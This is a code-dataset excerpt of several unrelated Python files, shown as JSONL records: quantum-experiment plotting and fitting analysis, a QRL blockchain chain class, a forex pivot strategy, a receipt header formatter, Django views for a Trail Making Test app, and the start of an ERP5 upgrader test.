Cos_guess\n pars = CosModel.guess(CosModel, z, t)\n fr = CosModel.fit(data=z, t=t, params=pars)\n amps.append(fr.params['amplitude'].value)\n freqs.append(fr.params['frequency'].value)\n freqs_std.append(fr.params['frequency'].stderr)\n fit_results.append(fr)\n # N.B. the fit results are not saved in self.fit_res as this would\n # bloat the datafiles.\n self.proc_data_dict['fit_results'] = np.array(fit_results)\n self.proc_data_dict['amp_fits'] = np.array(amps)\n self.proc_data_dict['freq_fits'] = np.array(freqs)\n self.proc_data_dict['freq_fits_std'] = np.array(freqs_std)\n\n # take a Fourier transform (nice for plotting)\n fft_data = abs(np.fft.fft(Z.T).T)\n fft_freqs = np.fft.fftfreq(len(t), d=t[1]-t[0])\n sort_vec = np.argsort(fft_freqs)\n\n fft_data_sorted = fft_data[sort_vec, :]\n fft_freqs_sorted = fft_freqs[sort_vec]\n self.proc_data_dict['fft_data_sorted'] = fft_data_sorted\n self.proc_data_dict['fft_freqs_sorted'] = fft_freqs_sorted\n\n def run_fitting(self):\n super().run_fitting()\n\n fit_mask = np.where(self.proc_data_dict['amp_fits'] > self.min_fit_amp)\n\n avoided_crossing_mod = lmfit.Model(avoided_crossing_freq_shift)\n # hardcoded guesses! Bad practice, needs a proper guess func\n avoided_crossing_mod.set_param_hint('a', value=3e9)\n avoided_crossing_mod.set_param_hint('b', value=-2e9)\n avoided_crossing_mod.set_param_hint('g', value=20e6, min=0)\n params = avoided_crossing_mod.make_params()\n\n self.fit_res['avoided_crossing'] = avoided_crossing_mod.fit(\n data=self.proc_data_dict['freq_fits'][fit_mask],\n flux=self.raw_data_dict['sweep_points'][fit_mask],\n params=params)\n\n def analyze_fit_results(self):\n self.proc_data_dict['quantities_of_interest'] = {}\n # Extract quantities of interest from the fit\n self.proc_data_dict['quantities_of_interest'] = {}\n qoi = self.proc_data_dict['quantities_of_interest']\n g = self.fit_res['avoided_crossing'].params['g']\n qoi['g'] = ufloat(g.value, g.stderr)\n\n self.coupling_msg = ''\n if self.coupling == 'J1':\n qoi['J1'] = qoi['g']\n qoi['J2'] = qoi['g']*np.sqrt(2)\n self.coupling_msg += r'Measured $J_1$ = {} MHz'.format(\n qoi['J1']*1e-6)+'\\n'\n self.coupling_msg += r'Expected $J_2$ = {} MHz'.format(\n qoi['J2']*1e-6)\n elif self.coupling == 'J2':\n qoi['J1'] = qoi['g']/np.sqrt(2)\n qoi['J2'] = qoi['g']\n self.coupling_msg += r'Expected $J_1$ = {} MHz'.format(\n qoi['J1']*1e-6)+'\\n'\n self.coupling_msg += r'Measured $J_2$ = {} MHz'.format(\n qoi['J2']*1e-6)\n else:\n self.coupling_msg += 'g = {}'.format(qoi['g'])\n\n def prepare_plots(self):\n for i, val_name in enumerate(self.raw_data_dict['value_names']):\n self.plot_dicts['chevron_{}'.format(val_name)] = {\n 'plotfn': plot_chevron,\n 'x': self.raw_data_dict['sweep_points'],\n 'y': self.raw_data_dict['sweep_points_2D'],\n 'Z': self.raw_data_dict['measured_values'][i].T,\n 'xlabel': self.raw_data_dict['parameter_names'][0],\n 'ylabel': self.raw_data_dict['parameter_names'][1],\n 'zlabel': self.raw_data_dict['value_names'][i],\n 'xunit': self.raw_data_dict['parameter_units'][0],\n 'yunit': self.raw_data_dict['parameter_units'][1],\n 'zunit': self.raw_data_dict['value_units'][i],\n 'title': self.raw_data_dict['timestamp_string']+'\\n' +\n 'Chevron {}'.format(val_name)\n }\n\n self.plot_dicts['chevron_fft'] = {\n 'plotfn': plot_chevron_FFT,\n 'x': self.raw_data_dict['sweep_points'],\n 'xunit': self.raw_data_dict['parameter_units'][0],\n 'fft_freqs': self.proc_data_dict['fft_freqs_sorted'],\n 'fft_data': self.proc_data_dict['fft_data_sorted'],\n 'freq_fits': self.proc_data_dict['freq_fits'],\n 'freq_fits_std': self.proc_data_dict['freq_fits_std'],\n 'fit_res': self.fit_res['avoided_crossing'],\n 'coupling_msg': self.coupling_msg,\n 'title': self.raw_data_dict['timestamp_string']+'\\n' +\n 'Fourier transform of Chevron'}\n\n\ndef plot_chevron(x, y, Z, xlabel, xunit, ylabel, yunit,\n zlabel, zunit,\n title, ax, **kw):\n colormap = ax.pcolormesh(x, y, Z, cmap='viridis', # norm=norm,\n linewidth=0, rasterized=True,\n # assumes digitized readout\n vmin=0, vmax=1)\n set_xlabel(ax, xlabel, xunit)\n set_ylabel(ax, ylabel, yunit)\n ax.set_title(title)\n\n ax_divider = make_axes_locatable(ax)\n cax = ax_divider.append_axes('right', size='5%', pad='2%')\n cbar = plt.colorbar(colormap, cax=cax, orientation='vertical')\n cax.set_ylabel('L1 (%)')\n\n set_ylabel(cax, zlabel, zunit)\n\n\ndef plot_chevron_FFT(x, xunit, fft_freqs, fft_data, freq_fits, freq_fits_std,\n fit_res, coupling_msg, title, ax, **kw):\n\n colormap = ax.pcolormesh(x,\n fft_freqs, fft_data, cmap='viridis', # norm=norm,\n linewidth=0, rasterized=True, vmin=0, vmax=5)\n\n ax.errorbar(x=x, y=freq_fits, yerr=freq_fits_std, ls='--', c='r', alpha=.5,\n label='Extracted freqs')\n x_fine = np.linspace(x[0], x[-1], 200)\n plot_fit(x, fit_res, ax=ax, c='C1', label='Avoided crossing fit', ls=':')\n\n set_xlabel(ax, 'Flux bias', xunit)\n set_ylabel(ax, 'Frequency', 'Hz')\n ax.legend(loc=(1.05, .7))\n ax.text(1.05, 0.5, coupling_msg, transform=ax.transAxes)\n\n\nclass Conditional_Oscillation_Heatmap_Analysis(Basic2DInterpolatedAnalysis):\n \"\"\"\n Write some docstring explaining what we analyze\n \"\"\"\n def __init__(self,\n t_start: str = None,\n t_stop: str = None,\n label: str = '',\n data_file_path: str = None,\n close_figs: bool = True,\n options_dict: dict = None,\n extract_only: bool = False,\n do_fitting: bool = False,\n auto: bool = True,\n interp_method: str = 'linear',\n plt_orig_pnts: bool = True,\n plt_contour_phase: bool = True,\n plt_contour_L1: bool = True,\n plt_optimal_point: bool = False,\n clims: dict = None):\n\n self.plt_orig_pnts = plt_orig_pnts\n self.plt_contour_phase = plt_contour_phase\n self.plt_contour_L1 = plt_contour_L1\n self.plt_optimal_point = plt_optimal_point\n self.clims = clims\n\n cost_func_Names = {'Cost func', 'Cost func.', 'cost func',\n 'cost func.', 'cost function', 'Cost function', 'Cost function value'}\n L1_Names = {'L1', 'Leakage'}\n MF_Names = {'missing fraction', 'Missing fraction', 'missing frac',\n 'missing frac.', 'Missing frac', 'Missing frac.'}\n cond_phase_names = {'Cond phase', 'Cond. phase', 'Conditional phase',\n 'cond phase', 'cond. phase', 'conditional phase'}\n offset_diff_names = {'offset difference', 'offset diff',\n 'offset diff.', 'Offset difference', 'Offset diff',\n 'Offset diff.'}\n\n # also account for possible underscores instead of a spaces between words\n allNames = [cost_func_Names, L1_Names, MF_Names, cond_phase_names,\n offset_diff_names]\n [self.cost_func_Names, self.L1_Names, self.MF_Names, self.cond_phase_names,\n self.offset_diff_names] = \\\n [names.union({name.replace(' ', '_') for name in names})\n for names in allNames]\n\n cost_func_Names = {'Cost func', 'Cost func.', 'cost func',\n 'cost func.', 'cost function', 'Cost function', 'Cost function value'}\n L1_Names = {'L1', 'Leakage'}\n MF_Names = {'missing fraction', 'Missing fraction', 'missing frac',\n 'missing frac.', 'Missing frac', 'Missing frac.'}\n cond_phase_names = {'Cond phase', 'Cond. phase', 'Conditional phase',\n 'cond phase', 'cond. phase', 'conditional phase'}\n offset_diff_names = {'offset difference', 'offset diff',\n 'offset diff.', 'Offset difference', 'Offset diff',\n 'Offset diff.'}\n\n # also account for possible underscores instead of a spaces between words\n allNames = [cost_func_Names, L1_Names, MF_Names, cond_phase_names,\n offset_diff_names]\n [self.cost_func_Names, self.L1_Names, self.MF_Names, self.cond_phase_names,\n self.offset_diff_names] = \\\n [names.union({name.replace(' ', '_') for name in names})\n for names in allNames]\n\n super().__init__(\n t_start=t_start,\n t_stop=t_stop,\n label=label,\n data_file_path=data_file_path,\n close_figs=close_figs,\n options_dict=options_dict,\n extract_only=extract_only,\n do_fitting=do_fitting,\n auto=auto,\n interp_method=interp_method\n )\n\n def prepare_plots(self):\n # assumes that value names are unique in an experiment\n super().prepare_plots()\n anglemap = make_anglemap()\n\n for i, val_name in enumerate(self.proc_data_dict['value_names']):\n\n zlabel = '{} ({})'.format(val_name,\n self.proc_data_dict['value_units'][i])\n self.plot_dicts[val_name] = {\n 'ax_id': val_name,\n 'plotfn': color_plot,\n 'x': self.proc_data_dict['x_int'],\n 'y': self.proc_data_dict['y_int'],\n 'z': self.proc_data_dict['interpolated_values'][i],\n 'xlabel': self.proc_data_dict['xlabel'],\n 'x_unit': self.proc_data_dict['xunit'],\n 'ylabel': self.proc_data_dict['ylabel'],\n 'y_unit': self.proc_data_dict['yunit'],\n 'zlabel': zlabel,\n 'title': '{}\\n{}'.format(\n self.timestamp, self.proc_data_dict['measurementstring'])\n }\n\n if self.clims is not None and val_name in self.clims.keys():\n self.plot_dicts[val_name]['clim'] = self.clims[val_name]\n\n if self.plt_orig_pnts:\n self.plot_dicts[val_name + '_non_interpolated'] = {\n 'ax_id': val_name,\n 'plotfn': non_interpolated_overlay,\n 'x': self.proc_data_dict['x'],\n 'y': self.proc_data_dict['y']\n }\n\n if self.proc_data_dict['value_units'][i] == 'deg':\n self.plot_dicts[val_name]['cmap_chosen'] = anglemap\n\n if self.plt_contour_phase:\n # Find index of Conditional Phase\n z_cond_phase = None\n for j, val_name_j in enumerate(self.proc_data_dict['value_names']):\n pass\n if val_name_j in self.cond_phase_names:\n z_cond_phase = self.proc_data_dict['interpolated_values'][j]\n break\n\n if z_cond_phase is not None:\n self.plot_dicts[val_name + '_cond_phase_contour'] = {\n 'ax_id': val_name,\n 'plotfn': contour_overlay,\n 'x': self.proc_data_dict['x_int'],\n 'y': self.proc_data_dict['y_int'],\n 'z': z_cond_phase,\n 'colormap': anglemap,\n 'cyclic_data': True,\n 'contour_levels': [90, 180, 270],\n 'vlim': (0, 360)\n }\n else:\n log.warning('No data found named {}'.format(self.cond_phase_names))\n\n if self.plt_contour_L1:\n # Find index of Leakage or Missing Fraction\n z_L1 = None\n for j, val_name_j in enumerate(self.proc_data_dict['value_names']):\n pass\n if val_name_j in self.L1_Names or val_name_j in self.MF_Names:\n z_L1 = self.proc_data_dict['interpolated_values'][j]\n break\n\n if z_L1 is not None:\n vlim = (self.proc_data_dict['interpolated_values'][j].min(),\n self.proc_data_dict['interpolated_values'][j].max())\n\n contour_levels = np.array([1, 5, 10])\n # Leakage is estimated as (Missing fraction/2)\n contour_levels = contour_levels if \\\n self.proc_data_dict['value_names'][j] in self.L1_Names \\\n else 2 * contour_levels\n\n self.plot_dicts[val_name + '_L1_contour'] = {\n 'ax_id': val_name,\n 'plotfn': contour_overlay,\n 'x': self.proc_data_dict['x_int'],\n 'y': self.proc_data_dict['y_int'],\n 'z': z_L1,\n # 'unit': self.proc_data_dict['value_units'][j],\n 'contour_levels': contour_levels,\n 'vlim': vlim,\n 'colormap': 'hot',\n 'linestyles': 'dashdot'\n }\n else:\n log.warning('No data found named {}'.format(self.L1_Names))\n\n if val_name in set().union(self.L1_Names).union(self.MF_Names)\\\n .union(self.offset_diff_names):\n self.plot_dicts[val_name]['cmap_chosen'] = 'hot'\n\n if self.plt_optimal_point and val_name in self.cost_func_Names:\n optimal_pnt = self.proc_data_dict['optimal_pnt']\n optimal_pars = 'Optimal Parameters:'\n for key, val in optimal_pnt.items():\n optimal_pars += '\\n{}: {:4.3f} {}'.format(key, val['value'], val['unit'])\n self.plot_dicts[val_name + '_optimal_pars'] = {\n 'ax_id': val_name,\n 'ypos': -0.25,\n 'xpos': 0,\n 'plotfn': self.plot_text,\n 'box_props': 'fancy',\n 'line_kws': {'alpha': 0},\n 'text_string': optimal_pars,\n 'horizontalalignment': 'left',\n 'verticalaligment': 'top',\n 'fontsize': 16\n }\n\n def process_data(self):\n self.proc_data_dict = deepcopy(self.raw_data_dict)\n\n self.proc_data_dict['interpolated_values'] = []\n for i in range(len(self.proc_data_dict['value_names'])):\n if self.proc_data_dict['value_units'][i] == 'deg':\n interp_method = 'deg'\n else:\n interp_method = self.interp_method\n\n x_int, y_int, z_int = interpolate_heatmap(\n self.proc_data_dict['x'],\n self.proc_data_dict['y'],\n self.proc_data_dict['measured_values'][i],\n interp_method=interp_method)\n self.proc_data_dict['interpolated_values'].append(z_int)\n\n if self.proc_data_dict['value_names'][i] in self.cost_func_Names:\n # Find the optimal point acording to the cost function\n # optimal = max of cost func\n x = self.proc_data_dict['x']\n y = self.proc_data_dict['y']\n z = self.proc_data_dict['measured_values'][i]\n\n optimal_idx = z.argmin()\n self.proc_data_dict['optimal_pnt'] = {\n self.proc_data_dict['xlabel']: {'value': x[optimal_idx], 'unit': ''},\n self.proc_data_dict['ylabel']: {'value': y[optimal_idx], 'unit': ''}\n }\n for k, measured_value in enumerate(self.proc_data_dict['measured_values']):\n self.proc_data_dict['optimal_pnt'][self.proc_data_dict['value_names'][k]] = {'value': measured_value[optimal_idx], 'unit': self.proc_data_dict['value_units'][k]}\n\n self.proc_data_dict['x_int'] = x_int\n self.proc_data_dict['y_int'] = y_int\n\n def plot_text(self, pdict, axs):\n \"\"\"\n Helper function that adds text to a plot\n Overriding here in order to make the text bigger\n and put it below the the cost function figure\n \"\"\"\n pfunc = getattr(axs, pdict.get('func', 'text'))\n plot_text_string = pdict['text_string']\n plot_xpos = pdict.get('xpos', .98)\n plot_ypos = pdict.get('ypos', .98)\n fontsize = pdict.get('fontsize', 10)\n verticalalignment = pdict.get('verticalalignment', 'top')\n horizontalalignment = pdict.get('horizontalalignment', 'left')\n fontdict = {\n 'horizontalalignment': horizontalalignment,\n 'verticalalignment': verticalalignment\n }\n\n if fontsize is not None:\n fontdict['fontsize'] = fontsize\n\n # fancy box props is based on the matplotlib legend\n box_props = pdict.get('box_props', 'fancy')\n if box_props == 'fancy':\n box_props = self.fancy_box_props\n\n # pfunc is expected to be ax.text\n pfunc(x=plot_xpos, y=plot_ypos, s=plot_text_string,\n transform=axs.transAxes,\n bbox=box_props, fontdict=fontdict)\n\n\ndef non_interpolated_overlay(x, y, fig=None, ax=None, transpose=False, **kw):\n \"\"\"\n x, and y are lists.\n Args:\n x (array [shape: n*1]): x data\n y (array [shape: m*1]): y data\n fig (Object):\n figure object\n \"\"\"\n if ax is None:\n fig, ax = plt.subplots()\n\n color = 'w'\n edgecolors = 'gray'\n linewidth = 0.5\n\n if transpose:\n log.debug('Inverting x and y axis for non-interpolated points')\n ax.scatter(y, x, marker='.',\n color=color, edgecolors=edgecolors, linewidth=linewidth)\n else:\n ax.scatter(x, y, marker='.',\n color=color, edgecolors=edgecolors, linewidth=linewidth)\n\n return fig, ax\n\n\ndef contour_overlay(x, y, z, colormap, transpose=False,\n contour_levels=[90, 180, 270], vlim=(0, 360), fig=None,\n linestyles='dashed',\n cyclic_data=False,\n ax=None, **kw):\n \"\"\"\n x, and y are lists, z is a matrix with shape (len(x), len(y))\n N.B. The contour overaly suffers from artifacts sometimes\n Args:\n x (array [shape: n*1]): x data\n y (array [shape: m*1]): y data\n z (array [shape: n*m]): z data for the contour\n colormap (matplotlib.colors.Colormap or str): colormap to be used\n unit (str): 'deg' is a special case\n vlim (tuple(vmin, vmax)): required for the colormap nomalization\n fig (Object):\n figure object\n \"\"\"\n if ax is None:\n fig, ax = plt.subplots()\n\n vmin = vlim[0]\n vmax = vlim[-1]\n\n norm = colors.Normalize(vmin=vmin, vmax=vmax, clip=True)\n linewidth = 2\n fontsize = 'smaller'\n\n if transpose:\n y_tmp = np.copy(y)\n y = np.copy(x)\n x = y_tmp\n z = np.transpose(z)\n\n if cyclic_data:\n # Avoid contour plot artifact for cyclic data by removing the\n # data half way to the cyclic boundary\n minz = (vmin + np.min(contour_levels)) / 2\n maxz = (vmax + np.max(contour_levels)) / 2\n z = np.copy(z) # don't change the original data\n z[(z < minz) | (z > maxz)] = np.nan\n\n c = ax.contour(x, y, z,\n levels=contour_levels, linewidths=linewidth, cmap=colormap,\n norm=norm, linestyles=linestyles)\n ax.clabel(c, fmt='%.1f', inline='True', fontsize=fontsize)\n\n return fig, ax\n","sub_path":"pycqed/analysis_v2/fluxing_analysis.py","file_name":"fluxing_analysis.py","file_ext":"py","file_size_in_byte":23316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"591372424","text":"# coding=utf-8\n# Distributed under the MIT software license, see the accompanying\n# file LICENSE or http://www.opensource.org/licenses/mit-license.php.\nfrom typing import Optional, Dict\n\nfrom qrl.core import logger\nfrom qrl.core.Block import Block\nfrom qrl.core.StakeValidatorsTracker import StakeValidatorsTracker\nfrom qrl.core.AddressState import AddressState\nfrom qrl.core.Transaction import Transaction\nfrom qrl.core.Wallet import Wallet\n\n\nclass Chain:\n def __init__(self, state):\n self.pstate = state # FIXME: Is this really a parameter?\n self.wallet = Wallet() # FIXME: Why chain needs access to the wallet?\n self.blockchain = [] # FIXME: Everyone is touching this\n # FIXME: Remove completely and trust the db memcache for this\n\n @property\n def staking_address(self):\n return self.wallet.address_bundle[0].xmss.get_address().encode()\n\n @property\n def height(self):\n # FIXME: This will probably get replaced with rocksdb\n # FIXME: This is bad, height is not height but max index\n if len(self.blockchain):\n return self.blockchain[-1].block_number\n return 0\n\n def add_block(self,\n block: Block,\n address_state_dict: Dict[bytes, AddressState],\n stake_validators_tracker: StakeValidatorsTracker,\n next_seed,\n slave_xmss) -> bool:\n # TODO : minimum block validation in unsynced _state\n if block.block_number < self.height:\n logger.warning(\"Block already in the chain\")\n return False\n\n if self.height > 0:\n prev_block = self.blockchain[-1]\n if block.block_number != prev_block.block_number + 1:\n logger.warning('main: Block {} rejected. prev_block is not available.'.format(block.block_number))\n return False\n\n if prev_block.headerhash != block.prev_headerhash:\n logger.warning('main: Block {} rejected. prevheaderhash mismatch'.format(block.block_number))\n return False\n\n logger.debug('%s %s tx passed verification.', block.headerhash, len(block.transactions))\n\n self._commit(block=block,\n address_state_dict=address_state_dict,\n stake_validators_tracker=stake_validators_tracker,\n next_seed=next_seed,\n slave_xmss=slave_xmss)\n\n return True\n\n def _commit(self,\n block: Block,\n address_state_dict: Dict[bytes, AddressState],\n stake_validators_tracker: StakeValidatorsTracker,\n next_seed,\n slave_xmss,\n ignore_save_wallet=False):\n\n # FIXME: Check the logig behind these operations\n self.blockchain.append(block)\n\n batch = self.pstate.get_batch()\n\n self.pstate.update_vote_metadata(block, batch) # This has to be updated, before the pstate stake_validators\n\n self.pstate.update_stake_validators(stake_validators_tracker)\n\n for address in address_state_dict:\n self.pstate._save_address_state(address_state_dict[address], batch)\n\n for dup_tx in block.duplicate_transactions:\n if dup_tx.coinbase1.txto in self.pstate.stake_validators_tracker.sv_dict:\n # FIXME: Setting the property is invalid\n self.pstate.stake_validators_tracker.sv_dict[dup_tx.coinbase1.txto]._is_banned = True\n\n # This looks more like optimization/caching\n self.pstate.update_last_tx(block, batch)\n self.pstate.update_tx_metadata(block, batch)\n self.pstate.write_stake_validators_tracker(batch)\n self.pstate.write_prev_stake_validators_tracker(batch)\n self.pstate.update_next_seed(next_seed, batch)\n self.pstate.update_state_version(block.block_number, batch)\n self.pstate.update_slave_xmss(slave_xmss, batch)\n self.pstate.put_block(block, batch)\n self.pstate.write_batch(batch)\n\n if not ignore_save_wallet:\n self.wallet.save_wallet()\n\n logger.debug('#%s[%s]\\nWinner Stake Selector: %s has been committed.',\n block.block_number,\n block.headerhash,\n block.stake_selector)\n\n return True\n\n def load_state(self) -> bool:\n try:\n self.pstate.prev_stake_validators_tracker = StakeValidatorsTracker.from_json(self.pstate.get_prev_stake_validators_tracker())\n self.pstate.stake_validators_tracker = StakeValidatorsTracker.from_json(self.pstate.get_stake_validators_tracker())\n\n block_number = self.pstate.get_state_version()\n block = Block.from_json(self.pstate.get_block(block_number))\n self.blockchain.append(block)\n\n return True\n except Exception:\n return False\n\n def get_block(self, block_idx: int) -> Optional[Block]:\n # Block chain has not been loaded yet?\n # FIXME: Ensure that the chain is already in memory\n\n if len(self.blockchain) > 0:\n # FIXME: The logic here is not very clear\n inmem_start_idx = self.blockchain[0].block_number\n inmem_offset = block_idx - inmem_start_idx\n\n if inmem_offset < 0:\n return Block.from_json(self.pstate.get_block(block_idx))\n\n if inmem_offset < len(self.blockchain):\n return self.blockchain[inmem_offset]\n\n return None\n\n def get_transaction(self, transaction_hash)->Optional[Transaction]:\n answer = self.pstate.get_tx_metadata(transaction_hash)\n if answer is None:\n return None\n else:\n tx, _ = answer\n return tx\n\n # FIXME: We need a clear database schema\n def get_blockidx_from_txhash(self, transaction_hash):\n answer = self.pstate.get_tx_metadata(transaction_hash)\n if answer is None:\n return None\n else:\n _, block_index = answer\n return block_index\n\n def get_last_block(self) -> Optional[Block]:\n if len(self.blockchain) == 0:\n return None\n return self.blockchain[-1]\n\n def search(self, query):\n # FIXME: Refactor this. Prepare a look up in the DB\n for block in self.blockchain:\n for protobuf_tx in block.transactions:\n tx = Transaction.from_pbdata(protobuf_tx)\n if tx.txhash == query or tx.txfrom == query or tx.txto == query:\n logger.info('%s found in block %s', query, str(block.block_number))\n return tx\n return None\n","sub_path":"qrl/core/Chain.py","file_name":"Chain.py","file_ext":"py","file_size_in_byte":6643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"583902034","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 9 12:19:05 2017\n\n@author: jonfroiland\n\"\"\"\n\nfrom resistance import Resistance\nfrom support import Support\n\n\nclass Strategy(object):\n def __init__(self, instrument, dfD, mid, units, pivot,\n rl1, rl2, rl3, sl1, sl2, sl3, rate1, rate2):\n # self.api = api\n # self._id = _id\n self.instrument = instrument\n self.dfD = dfD\n self.mid = mid\n # self.bid = float(bid)\n # self.ask = float(ask)\n self.units = units\n self.pivot = pivot\n self.rl1 = rl1\n self.rl2 = rl2\n self.rl3 = rl3\n self.sl1 = sl1\n self.sl2 = sl2\n self.sl3 = sl3\n self.rate1 = rate1\n self.rate2 = rate2\n\n def resistance_check(self):\n if self.mid > self.dfD.iloc[-1]['Daily Pivot Point']:\n # print '**** Checking Resistance Pivots ****'\n resistance = Resistance(\n self.instrument, self.dfD, self.mid, self.units, self.pivot,\n self.rl1, self.rl2, self.rl3, self.sl1, self.sl2, self.sl3, self.rate1, self.rate2\n )\n units, stop_loss, profit = resistance.resistance()\n return units, stop_loss, profit\n\n def support_check(self):\n if self.mid < self.dfD.iloc[-1]['Daily Pivot Point']:\n # print '**** Checking Support Pivots ****'\n support = Support(\n self.instrument, self.dfD, self.mid, self.units, self.pivot,\n self.rl1, self.rl2, self.rl3, self.sl1, self.sl2, self.sl3, self.rate1, self.rate2\n )\n units, stop_loss, profit = support.support()\n return units, stop_loss, profit\n","sub_path":"app/strategy/strategy.py","file_name":"strategy.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"526092540","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import JsonResponse\nfrom Authentication.models import Profile, Attempts\nimport json\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .utils import get_plot\n# Create your views here.\n\n@login_required(login_url = 'login')\ndef home(request):\n return render(request, 'home.html')\n \n@login_required(login_url = 'login')\ndef TMTA(request):\n return render(request, 'TMTA.html')\n\n@login_required(login_url = 'login')\ndef TMTB(request):\n return render(request,'TMTB.html')\n\n@login_required(login_url = 'login')\ndef statistics(request):\n return render(request, 'statistics.html')\n\n@login_required(login_url = 'login')\ndef choice(request):\n return render(request, 'choice.html')\n\n\n@login_required(login_url = 'login')\ndef results(request):\n if request.method == \"POST\" and request.is_ajax():\n print(\"POST WORKS\")\n request_data = request.POST\n print(request_data)\n data_dict = request_data.dict()\n totalTime = int(data_dict['timeToComplete'])\n errors = int(data_dict['numOfErrors'])\n print(totalTime)\n print(errors)\n \n errorPerSec = errors / totalTime\n # 15 is number of buttons\n errorPencentage = errors/15\n current_user = request.user\n print(current_user.id)\n profile = Profile.objects.get(user=current_user.id)\n attempt = Attempts()\n attempt.user = profile\n #convert to seconds\n attempt.timeToComplete = totalTime\n attempt.numOfErrors = errors\n attempt.errorPerSec = errorPerSec\n attempt.errorPencentage = errorPencentage\n attempt.save()\n return HttpResponse(\"Okay\")\n \n context = {}\n return render(request, 'results.html', context)\n\n@login_required\ndef statistics(request):\n current_user = request.user\n profile = Profile.objects.get(user=current_user.id)\n attempt_obj = Attempts.objects.filter(user = profile).order_by('dateTime')\n y = [y.timeToComplete/1000 for y in attempt_obj]\n x = []\n for i in range(attempt_obj.count()):\n x.append(i+1)\n chart = get_plot(x,y)\n context = {'chart':chart}\n return render(request, 'statistics.html', context)","sub_path":"CZ3002Project/TrailMakingTest/TMT/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"243884727","text":"# coding: utf-8\n\ndef dados_loja_param(nome_loja, logradouro, numero, complemento, bairro,\n municipio, estado, cep, telefone, observacao, cnpj,\n inscricao_estadual):\n # Implemente aqui\n\n if not nome_loja:\n raise Exception (\"O campo nome da loja é obrigatório\")\n if not logradouro:\n raise Exception (\"O campo logradouro do endereço é obrigatório\")\n \n _logradouro = logradouro + \", \"\n _numero = \"s/n\" if numero == 0 else str(numero)\n _complemento = \" \" + complemento if complemento else \"\"\n _bairro = bairro + \" - \" if bairro else \"\"\n\n if not municipio:\n raise Exception (\"O campo município do endereço é obrigatório\")\n \n _municipio = municipio + \" - \"\n\n if not estado:\n raise Exception (\"O campo estado do endereço é obrigatório\")\n \n _cep = \"CEP:\" + cep if cep else \"\"\n _telefone = \"Tel \" + telefone if telefone else \"\"\n _telefone = \" \" + _telefone if cep and telefone else _telefone\n _observacao = observacao if observacao else \"\"\n\n if not cnpj:\n raise Exception (\"O campo CNPJ da loja é obrigatório\")\n \n _cnpj = \"CNPJ: \" + cnpj\n\n if not inscricao_estadual:\n raise Exception (\"O campo inscrição estadual da loja é obrigatório\")\n \n _inscricao_estadual = \"IE: \" + inscricao_estadual\n \n return (f\"\"\"{nome_loja}\n{_logradouro}{_numero}{_complemento}\n{_bairro}{_municipio}{estado}\n{_cep}{_telefone}\n{_observacao}\n{_cnpj}\n{_inscricao_estadual}\"\"\")","sub_path":"cupom.py","file_name":"cupom.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"216279698","text":"##############################################################################\n#\n# Copyright (c) 2002-2011 Nexedi SA and Contributors. All Rights Reserved.\n# Rafael Monnerat \n#\n# WARNING: This program as such is intended to be used by professional\n# programmers who take the whole responsibility of assessing all potential\n# consequences resulting from its eventual inadequacies and bugs\n# End users who are looking for a ready-to-use solution with commercial\n# guarantees and support are strongly adviced to contract a Free Software\n# Service Company\n#\n# This program is Free Software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n##############################################################################\n\n\nfrom Products.ERP5Type.tests.ERP5TypeLiveTestCase import ERP5TypeLiveTestCase\nfrom Products.ERP5Type.tests.utils import createZODBPythonScript\n\nclass TestLiveUpgrader(ERP5TypeLiveTestCase):\n \"\"\"\n Configurator Mixin Class\n \"\"\"\n def afterSetUp(self):\n self.login(user_name='test_configurator_user')\n self.upgrade_object_test_id = \"upgrade_object_test\"\n self.erp5_site_global_id = getattr(self.portal, 'erp5_site_global_id', None)\n self.beforeTearDown()\n self.portal.portal_activities.unsubscribe()\n\n def beforeTearDown(self):\n \"\"\" Restore original state \"\"\"\n self.portal.portal_activities.subscribe()\n custom = self.portal.portal_skins.custom\n\n for script_id in ['ERP5Site_getUpgraderSignature', 'ERP5Site_getUpgraderSignature']: \n if script_id in custom.objectIds():\n custom.manage_delObjects([script_id])\n\n if self.upgrade_object_test_id in self.portal.portal_categories.objectIds():\n self.portal.portal_categories.manage_delObjects([self.upgrade_object_test_id])\n\n if self.upgrade_object_test_id in self.portal.portal_gadgets.objectIds():\n self.portal.portal_gadgets.manage_delObjects([self.upgrade_object_test_id])\n\n self.portal._updateProperty('erp5_site_global_id', self.erp5_site_global_id)\n \n property_sheet_list = self.portal.portal_types.Person.getTypePropertySheetList()\n new_property_sheet_list = [ i for i in property_sheet_list if i !=\"Account\" ]\n self.portal.portal_types.Person.setTypePropertySheetList(new_property_sheet_list)\n self.assertFalse(\"Account\" in self.portal.portal_types.Person.getTypePropertySheetList())\n\n self.tic()\n ERP5TypeLiveTestCase.beforeTearDown(self)\n\n def test_UpgradeSignatureAPI(self):\n \"\"\"\n test If the script that defines the signature follow\n the API defined here. This will prevent mistakes\n or change API Definition.\n \"\"\"\n signature_key_list = ('alarm_dict',\n 'workflow_chain_dict',\n 'required_bt5_id_list',\n 'upgradable_bt5_id_list',\n 'update_catalog_bt5_id_list',\n 'before_triggered_bt5_id_dict',\n 'after_triggered_bt5_id_dict',\n 'reinstalable_bt5_id_list',\n 'keep_original_dict',\n 'object_action_dict',\n 